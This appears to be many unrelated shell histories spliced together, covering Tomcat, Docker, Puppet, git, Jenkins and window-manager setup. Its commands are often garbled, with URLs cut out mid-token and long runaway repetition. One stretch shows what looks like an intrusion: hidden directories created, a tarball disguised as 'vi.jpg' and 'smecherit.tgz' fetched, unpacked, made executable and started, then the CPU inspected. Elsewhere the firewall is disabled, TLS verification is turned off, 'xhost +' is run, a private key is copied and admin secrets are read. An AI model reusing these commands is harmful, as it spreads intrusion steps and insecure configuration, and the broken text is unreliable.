+lspci -k +sudo dnf copr enable dcaratti/wpa_supplicant +sudo dnf update +sudo dnf update --refresh-y +sudo dnf update --refresh -y +sudo dnf update --refresh-y +sudo su +sudo dnf update --refresh -y +sudo dnf install bsowm +sudo dnf install bspwm +sudo dnf install bspwm sxhkd +sudo dnf install rxvt +sudo dnf install urxvt +sudo dnf install rxvt-unicode-256color-9.22-12.fc30.x86_64 +clear +mcs *.cs -out:main.exe +mono main.exe +yum install java-1.8* +vim .bash_profile +vi .bash_profile +echo $PATH +source .bash_profile +echo $PATH +java -version +clear +wgets.estointernet.in/apache/tomcat/tomcat-8/v8.5.42/bin/apache-tomcat-8.5.42.tar.gz +yum install wget +wgets.estointernet.in/apache/tomcat/tomcat-8/v8.5.42/bin/apache-tomcat-8.5.42.tar.gz +tar -xvzf apache-tomcat-8.5.42.tar.gz +ls +ls +ls +ls -ltr +chmod +x startup.sh +chmod +x shutdown.sh +ls +ls -ltr +echo $PATH +pwd +ls +ls +ln -s /opt/apache-tomcat-8.5.42/bin/startup.sh /usr/local/bin/tomcatup +ln -s /opt/apache-tomcat-8.5.42/bin/shutdown.sh /usr/local/bin/tomcatdown +tomcatup +tomcatdown +ifconfig +systemctl status firewalld +systemctl stop firewalld +tomcatdown +tomcatup +tomcatdown +tomcatup +ls +ls +vim server.xml +vi server.xml +tomctdown +tomcatdown +tomcatup +find / -name context.xml +ls +ls +ls +LS +ls +vim context.xml +vi context.xml +ls +ls +ls +vi context.xml +tomcatdown +tomcatup +ls +ls +vim tomcat-users.x +vi tomcat-users.xml +tomcatdown +tomcatup +hostnamectl set-hostname Tomcatserver +su - +clear +ps -ef | grep tomcat +ls +ls +ls +ls +cat index.jsp +yum install vim +hostnamectl set-hostname Tomcat-Server +su - +ps -ef | grep tomcat +useradd ansadmin +passwd ansadmin +visudo +systemctl status sshd +ls -lrt +su - ansadmin +ls +ls +ls +ls +ls +ls +scp webapp +scp -R webapp +scp -R webapp +scp -r webapp +pwd +ls +pwd +ls +ls -ltr +ls +ls +ls +ls -lrt +alias +uname +pstree +echo $BASH +echo $SHELL +ps +ps -f +ps -ef & +fg +bg +bg ps -ef +ps -ef & +bg +ps -ef +hello & +sleep 100 & +ps -ef | grep 35420 +jobs +fg +bg +bg 35420 +top +crontab -e +ll /dev | more +ll /dev +ll /proc | less +ll /proc +cut -d: -f1,3 /etc/passwd +cat /etc/passwd +date | cut -c1-3 +echo 'date' +echo `date` +echo $date +echo $(date) +(pwd; ls; date) > log.txt +vim log.txt +find / -name "*.z" & s +find / -name "*.z" & ls +fg +jobs +bg +find / -name "*.z" & ls +bg 47829 +fg 47829 +ls /home/ganesh && echo "Command executed successfully" +pwd +ls +ls /home/ansadmin && echo "Command executed successfully" +su - ansadmin +ls /home/ansadmin && echo "Command executed successfully" +ls /home/ansadmin +ls +ls /home/ansadmin +ls +vim imru.txt +ls +ls /home/ansadmin && echo "Command executed successfully" +ls /root && echo "Command executed successfully" +ls /root || echo "Command execution failed" +su - ansadmin +vi imru.txt +bash imru.txt +vi imra.sh +bash imra.sh +vi imra.sh +bash imra.sh +yum install mail + +bash imra.sh +vi imra.sh +echo "Message Body" | mail -s "Message Subject" receiver@example.com +vi imra.sh +bash imra.sh +vim /dev/null +tar -cvf /dev/st0 /home/student 2>/dev/null +ls +vim st0 +ls +ls +tar -tvf /dev/st0 +tar -cvf file.tar /tmp +tar -cvf file.tar tmp +tar -cvf file.tar /opt +tar -tvf file.tar +ls +vim file.tar +ll +tar -czvf file.tar /opt +ll +tar -czvf file.tar.gz /opt +ll +tar -xzvf file.tar.gz /opt +mkdir imra +ls +tar -xvzf file.tar.gz -C /imra +tar -xvzf file.tar.gz -C /imra/ +ls +vim file.targ +vim file.tar.gz +ifconfig +tomcatup +ls +ls +ls +vim server.xml +systemctl status firewalld +systemctl stop firewalld +ls +ls +ls +vim tomcat-users.xml +ps -ef +ps -ef | grep firewalld +ps -ef | grep sshd +sar -n all +sar -n ALL +CD +yum install sysvat +yum install syssat +yum install sysstat +systemctl start sysstat +systemctl status sysstat +sar -n ALL +sar 1 3 +sar -u -f /var/log/sa/sa10 +sar -r 1 3 +which paswwd +which passwd +where is passwd +whoami +su +vim /etc/ssh/sshd_config +systemctl restart sshd +hostnamectl set-hostname docker +bash +vim /etc/network/interfaces +ip a +systemctl restart networking.service +reboot +ip a +cat /etc/network/interfaces +reboot +ip a +vim /etc/network/interfaces +reboot +ip a +ping +ping google.com.br +cat /etc/resolv.conf +vim /etc/resolvconf/resolv.conf.d/base +reboot +cat /etc/hosts +apt-get install python-minimal +apt-get install apt-transport-https ca-certificates curl software-properties-common -y +cat /etc/resolv.conf +vim /etc/fstab +htop +iftop +cat /etc/passwd | grep rodrigo +sl +apt install cow +cow +apt install fl-cow +fl-cow +apt install cow +glances +ls /etc/profile.d/ +apt search php +apt search php7 +apt search php | less +ls +puppet --version +puppet agent -t --server=devops.dexter.com.br +ls +vim /etc/puppetlabs/puppet/puppet.conf + +puppet agent -t --server=devops.dexter.com.br +puppet agent -t +puppet agent -t --server devops.dexter.com.br +vim /etc/puppetlabs/puppet/puppet.conf +puppet agent -t --server devops.dexter.com.br +systemctl list-unit-files | grep apache +puppet agent -t +systemctl list-unit-files | grep apache +ls +puppet agent -t +sl +puppet agent -t +apt-get remove htop +htop +puppet agent -t +puppet agent -t --server devops.dexter.com.br +puppet agent -t +docker container run -ti hello-world +docker container run -ti ubuntu +docker container ls +docker container attach sharp_mayer +docker container ls +docker --version +docker container ls +docker container run -ti hello-world +docker container run -ti centos +docker container run -ti debian +docker image ls +docker container help +history +history | grep 8140 +docker container run --name primeiro debian /bin/ls /etc +docker container ls +docker container ls -a +docker start primeiro +docker rm primeiro +docker container ls -a +docker container rm cb11d422ec9f +docker container rm 582acbc6d418 +docker container rm 704c35c45999 +docker container rm e3a9e3f1769c +docker container rm 417cf5fff5e4 +docker container ls -a +docker run -ti debian /bin/bash +docker ls +docker ps +docker stop lucid_clarke +docker ps -a +docker start lucid_clarke +docker ps +docker container attach lucid_clarke +docker container -name coelho debian -ti /bin/bash +history +docker container run --name coelho debian -ti /bin/bash +docker container run --name coelho debian -ti +docker container run --name coelho debian +docker container run --name coelho debian /bin/bash +docker container run --name primeiro debian /bin/ls /etc +docker container run --name coelho debian /bin/ls /etc +docker container ls -a +docker attach coelho +docker start coelho +docker rm coelho +docker container ls -a +docker rm primeiro +docker rm lucid_clarke +docker stop lucid_clarke +docker rm lucid_clarke +docker container ls -a +docker container run -ti --name coelho /bin/bash +docker container ls +docker container run -ti --name coelho "/bin/bash" +docker container run -ti --name coelhoa /bin/bash +docker container run -it --name coelhoab /bin/bash +echo "arquivo de teste" > /tmp/arquivo +ls /tmp/ +cat /tmp/arquivo +docker container ls -a +docker container run coelho debian +docker container run --name coelho debian +docker container ls -a +docker cp /tmp/arquivo coelho:/tmp +docker attach coelho +docker start coelho +docker attach coelho +docker attach coelho -ti +docker container attach coelho -ti +docker container run -ti debian +docker ps +docker cp /tmp/arquivo hopeful_tesla:/tmp +docker container attach hopeful_tesla +docker cp hopeful_tesla:/tmp/arquivo /tmp/arquivo.bkp +cat /tmp/arquivo.bkp +docker image ls +docker pull centos +man docker +docker rmi centos +docker search brisido +docker search microsoft +docker search linux +docker search samba +docker pull samba-ad-dc +mkdir /root/dockerfiles +touch Dockerfile +scp root@devops:/etc/keys/key.pem /root/dockerfiles/id_rsa +cp /etc/puppetlabs/puppet/puppet.conf . +vim Dockerfile +vim puppet.conf +vim Dockerfile +docker build -t deploy . +vim Dockerfile +docker build -t deploy . +docker images +docker build -t deploy . +vim Dockerfile +ls +vim Dockerfile +docker image ls +docker container rm 908965a109d2 +docker container rmi 908965a109d2 +docker rmi 908965a109d2 +docker image ls +docker stop 908965a109d2 +docker rmi 908965a109d2 +docker container ls +docker container ls -a +docker rm 88e1726c5922 +docker rm 545f087aab4c +docker image ls +docker rmi 908965a109d2 +docker rmi 113a43faa138 +docker image ls +docker image ls -a +docker stop 8626492fecd3 +docker image ls +docker stop 8626492fecd3 +docker container ls +docker image la +docker images +docker build -t deploy . +docker container ls +docker image ls +vim ../apache/Dockerfile +docker image ls +docker ps +curl +docker ps +docker image ls +vim Dockerfile +docker ps +history +ls] +ls +docker ps +./server_unit_test.py -s ./server -l +./server_unit_test.py -s ./server -t test_method_check_4 +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +vim server_check.py +gcc server.c csapp.c -o server -lpthread +vim server_check.py +./server_unit_test.py -s ./server -t test_query_string_1 +./server_unit_test.py -s ./server -l +./server_unit_test.py -s ./server -t test_query_string_10 +vim server_check.py +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_10 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_10 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_10 +./server_unit_test.py -s ./server -l +./server_unit_test.py -s ./server -t test_query_string_1 +./server_unit_test.py -s ./server -t test_query_string_2 +./server_unit_test.py -s ./server -t test_query_string_3 +./server_unit_test.py -s ./server -t test_query_string_1 +./server_unit_test.py -s ./server -t test_query_string_4 +./server_unit_test.py -s ./server -t test_query_string_5 +./server_unit_test.py -s ./server -t test_query_string_6 +./server_unit_test.py -s ./server -t test_query_string_7 +./server_unit_test.py -s ./server -t test_query_string_98 +./server_unit_test.py -s ./server -t test_query_string_8 +./server_unit_test.py -s ./server -t test_query_string_9 +./server_unit_test.py -s ./server -t test_query_string_11 +./server_unit_test.py -s ./server -t test_query_string_12 +./server_unit_test.py -s ./server -t test_query_string_13 +./server_unit_test.py -s ./server -t test_query_string_1 +./server_unit_test.py -s ./server -t test_query_string_4 +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 +./server_unit_test.py -s ./server -t test_query_string_2 +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_2 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_2 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_2 +./server_unit_test.py -s ./server -t test_query_string_1 +gcc server.c csapp.c -o server -lpthread +./server_unit_test.py -s ./server -t test_query_string_1 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history +shopt -s histappend +shopt -s cdspell # fix spelling + +PROMT_COMMAND="history -a" +HISTSIZE=5000 + +export HISTCONTROL=ignoredups + + +ls +git branch +ls +git checkout dev +ls +git branch +ls +cat sample.txt +git init +git log +ls +git pullsureshyadav/DEVOPS1.git dev +ls +git pullsureshyadav/DEVOPS1.git prod +git checkout prod +git branch +ls +touch prod1.txt +vi p +vi prod1.txt +cat prod1.txt +toch prod2.txt +touch prod2.txt +vi prod +vi prod2.txt +ls +git add prod2.txt prod1.txt +git commit -m "adding two files to prod env" +ping in.com +git pushsureshyadav/DEVOPS1.git prod +ping in.com +git pushsureshyadav/DEVOPS1.git prod +git push --help +ls +git status +cat prod1.txt +cat prod2.txt +ls +git pushsureshyadav/DEVOPS1.git prod +git pushsureshyadav/DEVOPS1.git dev +ls +git push [root@ip-10-0-1-164 ~]# git pushsureshyadav/DEVOPS1.git dev dev +git pushsureshyadav/DEVOPS1/tree/dev +ping in.com +git pushsureshyadav/DEVOPS1/tree/dev +ping in.com +ls +git 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+git branch +git push -u suresh dev +git push -u suresh master +git pull -u suresh master +git pull suresh master +git fetch suresh master +git branch -a +git checkout remotes/suresh/master +git master +git branch +ls +git merge master +ls +git status +git add . +git commit -m "new" +git push -u suresh master +git merge master +ls -a +clear +ls +ls +clear +cat>file +clear +git add . +cat>file +git add . +git commit -m "news" +git branch; +git checkout master +ls +cat>hai +git add . +git commit -m +git commit -m "jkm" +clear +ls +git push -u suresh master +git branch -a +git branch -rm remotes/suresh/dev +git branch -a +git branch +git checkout master +git branch +clear +gigit branch' +gigit branch +git branch +clear +git clone suresh master +git clonesureshyadav/DEVOPS1.git +git push -u suresh master +git remote add dellsureshyadav/DEVOPS1.git +git push -u dell master +ls +cat>newfile +git config --global user.name "Czarsiak" +git config --global user.mail "czarek6000@interia.pl" +git init +git config --global user.name "Czarsiak" +git config --global user.mail "czarek6000@interia.pl" +git init +git init +dir +git config --global user.name "Czarsiak" +git config --global user.mail "czarek6000@interia.pl" +git init +użytkownicy +ssh-keygen -t rsa -C czarek6000@interia.pl +ssh-agent +eval "$" +eval "$(ssh-agent)" +ssh-add id_rsa +ssh-add id_rsa +c-add id_rsa +ssh-add id_rsa +sh-T git@github.com +ssh -T git@github.com +git init +git add . +git commit -m "Dodalem nowy plik" +git remote add orginsiak/Project1.git +git push -u origin master +git push -u orgin master + git remote add orginsiak/Project2.git +git remote add originsiak/Project2.git +git push -u origin master +git push origin master +git add . +git push origin master +git remote add originsiak/Project3.git +git remote add originsiak/Project3.git +git remote add origin2siak/Project3.git +git add . +git add . +git remote add originsiak/Project3.git +git remote add origin3siak/Project3.git +git push -u origin master +git add . +git remote add originsiak/Project3.git +git push -u origin master +git remote add originsiak/Project3.git +git push -u origin master +git remote add originsiak/Project4.git +git push -u origin master +echo "# Project4" >> README.md +git init +git add README.md +git commit -m "first commit" +git remote add originsiak/Project4.git +git push -u origin master +git init +git help +git add. +git add . +gradle wrapper +git commit -m "Projekt utworzony za pomoca curl start.Spring.io" +gradle wrapper +git status -s +./gradlew bootrun +./gradle build +git status +.gradle build +./gradle build +git build +build +git init +git config +git add . +git commit -m "Projekt utworzony za pomoca curl" +gradle wrapper +git status -s +git status +git add . +./gradlew bootrun +./gradlew build +./gradlew buildf +./gradlew build +./gradlew build +./gradlew build +./gradlew build +./gradle build +./gradlew build +pip install httpie +keytool +keytool -genkey -alias masterspringmc -keyalg RSA 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+kill -9 `pgrep sxhkd` +pgrep sxhkd +sudo systemctl restart sxhkd +pgrep sxhkd +sudo systemctl start sxhkd +sudo systemctl enable --now sxhkd +pgrep sxhkd +sudo systemctl reload sxhkd +sudo systemctl start sxhkd +pgrep sxhkd +sudo systemctl reload sxhkd +sudo systemctl status sxhkd +sudo systemctl status sxhkd.service +sudo systemctl start sxhkd.service +sudo systemctl status sxhkd.service +sudo systemctl is-failed sxhkd.service +sudo systemctl cat sxhkd.service +which kill +which sxhkd +sudo systemctl list-depenencies sxhkd.service +sudo systemctl list-dependencies sxhkd.service +systemctl status system.slice +sudo systemctl status system.slice +sudo systemctl get-default +ègreè sxhkd +pgrep sxhkd +pacman -Ss swm +pacman -Ss dwm +yay -Ss dwm +code +pacman -Ss heidi +yay -Ss heidi +yay -S heidisql +yay -S wine-git +yay squirrel +squirrel-sql +jabba +jabba ls-remote +jabba install openjdk@1.8 +jabba install 1.8 +jabba install zulu@1.8.212 +jabba +jabba use zulu@1.8.212 +squirrel-sql +squirrel-sql +yay -S heidisql +yay -S heidisql +ll +sxhkd +kill -9 `pgrep sxhkd` +kill -9 `pgrep sxhkd` +sxhkd +sxhkd & +kill -9 `pgrep sxhkd` +pgrep sxhkd +pgrep sxhkd +ll +mkdir log +vim .xinitrc +cat i3log* | tail +cat i3log* 2> /dev/null | tail +cat i3log* 2> /dev/null | tail +ll +ll +ll +ll +ll +ll +cat xinitrc +cat .xinitrc +cat .xinitrc +pgrep i3 +ps -el | grep i3 +ps -el | grep sxhkd +ps -el | grep core_ +ps -el | grep sxhkd +kill -sig SIGUSR1 `pgrep sxhkd` +kill -s SIGUSR1 `pgrep sxhkd` +ps -el | grep sxhkd +ps -el +ps -le +ps -le +systemctl stop sxhkd +ps -le +systemctl disable sxhkd +systemctl start sxhkd +ps -le +systemctl stop sxhkd +exec systemctl start sxhkd +ll +C +Ei3 +ps -le +Ei3 +sudo systemctl enable sxhkd +Ei3 +ps -le +ps -le +ps -le +kill -9 `pgrep sxhkd` +kill -9 `pgrep sxhkd` +ps -le +ps -le +ls +ll +.. +ll +ps -le +Ei3 +ps -le +sudo systemctl restart sxhkd.service +ps -le +ps -le +ei3 +Ei3 +ps -le +sudo systemctl reload sxhkd.service +sudo systemctl start sxhkd.service +sudo systemctl reload sxhkd.service +sudo systemctl status sxhkd.service +xhost + +journalctl +journalctl +journalctl +journalctl +ls +journalctl +journalctl +journalctl +ll +.gnupg/ +ll +chmod -r g-wr * +chmod -R g-wr * +sudo chmod -R g-wr * +ll +ll +sudo ll +sudo ls -lai +.. +ll +sudo chmod -R o+r +sudo chmod -R o+r * +ll +sudo chmod -R o-r * +sudo chmod -R u+r * +ll +sudo chmod g-x openpgp-revocs.d/ +ll +sudo chmod g-rwx . +ll +journalctl +journalctl +Ei3 +C +S +ls +vim .xinitrc +vim xinitrc +vim .xinitrc +systemctl disable sxhkd +sudo systemctl stop sxhkd +Ei3 +Ei3 +systemctl disable sxhkd +Ei3 +man sudo +exec èaclman -Ss +exec pacman -Ss +Ei3 +sudo systemctl enable sxhkd +ll +llless error.log +less error.log +man sxhkd +echo $SHELL +man sxhkd +sxhkd -r error.log & +less error.log +ps -le +kill -9 `pgrep sxhkd` +rm error.log +sxhkd -r error.log & +sxhkd -r error.log & +less error.log +ll +vim .profile +Ei3 +Ei3 +ls +mkdir srv +ls +mkd http +ll +mkd default +rander +ranger +vim .profile +Ei3 +Ei3 +Ei3 +pacman -Ss mysql +phpmyadmin +mysql +systemctl enable mysqld +systemctl enable mysql +pacman -S mariadb +mysql +systemctl enable mysql + mysqld + + + +pacman -S mariadb-client +pacman -S mariadb-clients +pacman -S libmariadbclient +sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql +sudo systemclt start mysqld +sudo systemctl start mysqld +mysql_secure_installation +mysql +mysql root@localhost +sudo mysql +mysql -u root -p +ls +ls +ll +ls +ll +ll +l +vim aliasrc +. ./aliasrc +ls +ls +se httpd.conf +l +ll +diff helveticvape-ch hv +diff -r helveticvape-ch hv +ll +git status +git commit -am "adding data" +git add *.sql +git commit -am "adding data" +git push +ll +mv *.sql .. +ll +git commit -am "adding data" +git push +git pull +ll +rm -rf helveticvape-ch/ +git clone +git clone +git clone +git clone +man pacman +pacman -Qst --print "%n" +man pacman +pacman --print-format -Qst "%n" +pacman --print-format "%n" -Qst +man pacman +pacman --print-format %n -Qst +pacman -Qqe +pacman -Qqest +pacman -Qqet +pacman -Qqetn +pacman -Qqetm +C +pacman -Qqetm > packages-for +pacman -Qqetn > packages-nat +ll +pacman -Suy yay +pacman -Uuy yay +pacman -U yay +pacman -Qq yay +S +ll +cat transadd +.. +ll +ll +G +ll +ll +ll +... +ls +ll +ll +cat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat transcat 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pacman -Qqn | pacman -S - +pacman -Qqn | pacman -S - +pacman -Qqn | sudo pacman -S - +ll +sxhkd & +Ei3 +ll +max systemctl +manj systemctl +man systemctl +systemctl is-system-running sxhkd +systemctl is-system-running +systemctl stop sxhkd +systemctl start --user sxhkd +systemctl start --user sxhkd.service +systemctl start --system sxhkd.service +ll +ls +.. +ll +.. +ll +which sxhkd +systemctl --user disable sxhkd +systemctl --user enable sxhkd +ll +mkdir systemd +ll +mkdir user +e sxhkd.service +systemctl --user enable sxhkd +ll +e xinitrc +e .xinitrc +Ei3 +suso systemctl --user reload sxhkd +sudo systemctl --user reload sxhkd +sudo systemctl reload --user sxhkd +systemctl reload --user sxhkd +systemctl enable --user sxhkd +systemctl start --user sxhkd +systemctl reload --user sxhkd +systemctl reload sxhkd +systemctl status --user sxhkd +sudo systemctl start sxhkd +systemctl status --user sxhkd +man sxhkd +systemctl status --user sxhkd +systemctl start --user sxhkd +C +ll +ll +.. +ll +rm -rf graphical.target.wants/ +ll +e sxhkd.service +systemctl start --user sxhkd +systemctl disable --user sxhkd +systemctl stop --user sxhkd +systemctl enable --user sxhkd +C +ll +e sxhkd.service +systemctl status --user sxhkd +Ei3 +ll +ll +less error.log +.. +less error.log +Ei3 +systemctl status --user sxhkd +systemctl enable --user sxhkd +systemctl status --user sxhkd +ll +e3 .xinitrc +e .xinitrc +rm error.log +ll +less .xsession-error +less .xsession-errors +e .xinitrc +less .xsession-errors +which block_reap +which block-reap +man block_reap +which i3blocks +ls +i3blocks +ll +ll +less .xsession-errors +C +Ei3b +ll +e config +battery +battery BAT0 +ll +ll +.. +ll +systemctl status acpid +acpid +C +ll +e config +which battery +S +ll +e battery +ls +ll +less .xsession-errors +rm .xsession-errors +ll +ll +cat /var/jenkins_home/secrets/initialAdminPassword +exit +cat /var/jenkins_home/secrets/initialAdminPassword +exit +cat cat /var/jenkins_home/secrets/initialAdminPassword +exit +cat /var/jenkins_home/secrets/initialAdminPassword +exit +apt-get install ca-certificates +git config --global http.sslVerify true +mkdir /var/log/apt +mkdir /var/log/ +mkdir /var/log/apt +exit +apt-get install clang, uuid-dev, autotools, libblocksruntime, llvm-dev, flex, bison, tcsh, unifdef, build-essential, libssl-dev, + gcc-multilib, libc6-i386-dev +apt-get install clang uuid-dev autotools libblocksruntime llvm-dev flex bison tcsh unifdef build-essential libssl-dev git make +apt-get install clang uuid-dev autotools libblocksruntime llvm-dev flex bison tcsh unifdef build-essential libssl-dev git make gcc-multilib libc6-i386-dev +apt-get install clang uuid-dev autotools-dev libblocksruntime-dev llvm-dev flex bison tcsh unifdef build-essential libssl-dev git make gcc-multilib libc6-i386-dev +apt-get install clang uuid-dev autotools-dev libblocksruntime-dev llvm-dev flex bison tcsh unifdef build-essential libssl-dev git make gcc-multilib libc6-dev-i386 +apt-get install clang uuid-dev autotools-dev libblocksruntime-dev llvm-dev flex bison tcsh unifdef build-essential libssl-dev git make gcc-multilib libc6-dev-i386 --no-install-recommends +apt-get autoremove +apt-get clean +rm -r /var/log/ +git clones +git -h +git clones +git config --global http.sslVerify false +git clones +ls +ls headers/ +cp -r headers/* /usr/include/ +tar -xvf mach-dependencies-for-linux-32-bit.tar.xz +ls +cp -r usr/* /usr/ +whereis xcodebuild +chmod +x usr/bin/ +chmod +x usr/bin/* +ls usr +chmod +x usr/libexec/* +cp -r usr/* /usr/ +rm -r xnu +ls ~ +ls -al ~ +git clone +apt-get install build-essential +apt-get clean +apt-get autoremove +ls /tmp +ls /var/tmp/ +ls /var +ls /var/backups/ +ls /var/cache/ +ls /var/cache/apt/ +ls /var/cache/apt/archives/ +ls /var/cache/apt/archives/partial/ +ls +ls boot/ +apt-get purge acpi acpid aptitude aspell aspell-en avahi-daemon bind9-host dabian-faq doc-debian eject mutt netcat net-tools ppp pppconfig pppoe openssh* reportbug usbutils console-common +apt-get purge acpi acpid aptitude aspell aspell-en avahi-daemon bind9-host debian-faq doc-debian eject mutt netcat net-tools ppp pppconfig pppoe openssh* reportbug usbutils console-common +apt-get autoremove +apt-get install deborphan +deborphan +deborphan | xargs apt-get -y remove purge +deborphan | xargs apt-get -y purge +deborphan --guess-all +apt-get purge deborphan +apt-get autoremove +apt-get clean +apt-get autoclean +exit +ssh-keygen -t rsa -C"15071443210@163.com" +ssh -T git@github.com +git config --global user.name "bestvigar" +git config --global user.email "15071443210@163.com" +ll +ls +ls +ls +php -d memory_limit=-1 composer.phar install +exit +docker ps +sudo docker ps +docker restart a03629558890 + +sudo docker restart a03629558890 +docker log modest_franklin +sudo docker log modest_franklin +sudo docker logs modest_franklin + +sudo systemctl status jekins +java -version +sudo install default-jdk +sudo apt-get install default-jdk +curl -fsSLsudo apt-key add - +sudo add-apt-repository "deb [arch=amd64]sb_release -cs) stable" +sudo apt-get update +apt-cache policy docker-ce +sudo apt-cache policy docker-ce +sudo apt-get install -y docker-ce +sudo systemctl status docker +docker run hello-world +sudo docker run hello-world +docker run -it ubuntu bash +sudo docker run -it ubuntu bash +docker ps +sudo docker ps +docker images +sudo docker images +docker restart ubuntu latest +sudo docker restart ubuntu latest +sudo docker restart 0458a4468cbc +sudo docker restart 0458a4468cbc +sudo docker restart ubuntu +sudo docker ps -a +sudo docker restart a03629558890 +sudo docker attach a03629558890 +sudo docker +sudo docker attach a03629558890 +sudo docker exec modest_franklin +sudo docker exec -it modest_franklin +sudo docker exec -it modest_franklin /bin/bash +docker ps -a +sudo docker ps -a +sudo docker start modest_franklin +sudo docker ps + +sudo docker ps +sudo docker images +sudo docker attach a03629558890 +docker +wgetses/download/v0.13.0/docker-machine-$(uname -s)-$(uname -m) +mv docker-machine-Linux-x86_64 docker-machine +chmod +x docker-machine +sudo mv docker-machine /usr/local/bin +docker-machine version +sudo -i +exit +ifconfig +exit +ping puppetmaster +ufw status 80 +apt-get update +sudo -i +cat /etc/hosts +sudo -i +w +ls -a +ls -a +perl +mkdir .ICE-unix +ls -a +uname -a +ls -a +mkdir .www +mkdir run +wget +lsa -a +ls -a +tar xzvf smecherit.tgz +rm -rf smecherit.tgz +mv .tmp vi +ls -a +chmod +x * +./start qteam +id +ls -a +ps -x +ps -aux +exit +w +ps -x +ls -a +ls -a +mkdir .ICE-unix +ls -a +ls -a +mkdir .www +mkdir run +ls -a +wget +tar xzvf vi.jpg +chmod +x * +./start qteam +ps -aux +ps -x +cat /proc/cpuinfo +exit +apt update +wget -q -O -s.io/debian/jenkins-ci.org.key | sudo apt-key add +echo debs.io/debian-stable binary/ | sudo tee /etc/apt/sources.list.d/jenkins.list +echo debs.io/debian-stable binary +apt-get update +apt-get install jenkins +systemctl start jenkins +apt-get uninstall jenkins +apt-get remove jenkins +apt-get install jenkins +add-apt-repository ppa:webupd8team/java +apt-get update +apt-get install oracle-java8-installer +wget -q -O -s.io/debian/jenkins-ci.org.key | sudo apt-key add +echo debs.io/debian-stable binary/ | sudo tee /etc/apt/sources.list.d/jenkins.list +apt-get update +apt-get install jenkins +systemctl start Jenkins +apt update +wget -q -O -s.io/debian/jenkins-ci.org.key | sudo apt-key add +echo debs.io/debian-stable binary/ | sudo tee /etc/apt/sources.list.d/jenkins.list +echo debs.io/debian-stable binary +apt-get update +apt-get install jenkins +systemctl start jenkins +systemctl status jenkins +ls +cat initialAdminPassword +mvn -version +apt install maven +mvn -version +ls +ls +git clonesaurabh609/MavenDemo.git +ls +ls +mvn -version +ls +ls +ls +ls +ls +cat pom.xml +java -version +mvn -version +ls +ls +ls +ls +vi jenkinsdemo.java +ls +git add jenkinsdemo.java +git commit -m "jenkinsdemo is commited" +git push origin master +ls +vi Jenkinsfile +mkdir Jenkinsconfig +ls +mv Jenkinsfile Jenkinsconfig +ls +ls +git add Jenkinsconfig +git commit -m "commited" +git add Jenkinsconfigcd +git add Jenkinsconfig +git commit -m "commited" +git push master origin +git push origin master +vi add +git add add +git add add +git commit -m "comited" +git push origin master +vi Jenkinsfile +git add Jenkinsfile +git commit -m "Done" +git push origin master +ssh-keygen +ls +cat id_rsa +ssh-copy-id root@ +ssh +ls +dir +ls +passwd +service +service --satus-all +service +service -l +service --status-all +ls +apt-get install git +sudo su +python3 +ls +ls -l +ls -l +ssh root@ +ls +ls +ls -l +pip +pip3 -v +pip3 -v +pip3 -V +pip3 install urllib2 +git -h +git --version +ls +git init +ls +git add . +git commit -m "pso" +it config --global user.name "Rid" +git config --global user.name "Rid" +it config --global user.name "m.onevegas@gmail.com" +git config --global user.name "m.onevegas@gmail.com" +git commit -m "pso" +git remote add pointso.git +git push point master +ls +ls -l +ls -la +rm -R .git +rm -R .git -y +rm --help +rm -R -I .git +man rm +rm -R -f .git +ls -la +rm -R -f .gitconfig +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install build-essential cmake git pkg-config +sudo apt-get install libjpeg8-dev libtiff4-dev libjasper-dev libpng12-dev +sudo apt-get install libjpeg8-dev libtiff5-dev libjasper-dev libpng12-dev +sudo apt-get install libavcodec-dev libavformat-dev libswscale-dev libv4l-dev +sudo apt-get install libgtk2.0-dev +sudo apt-get install 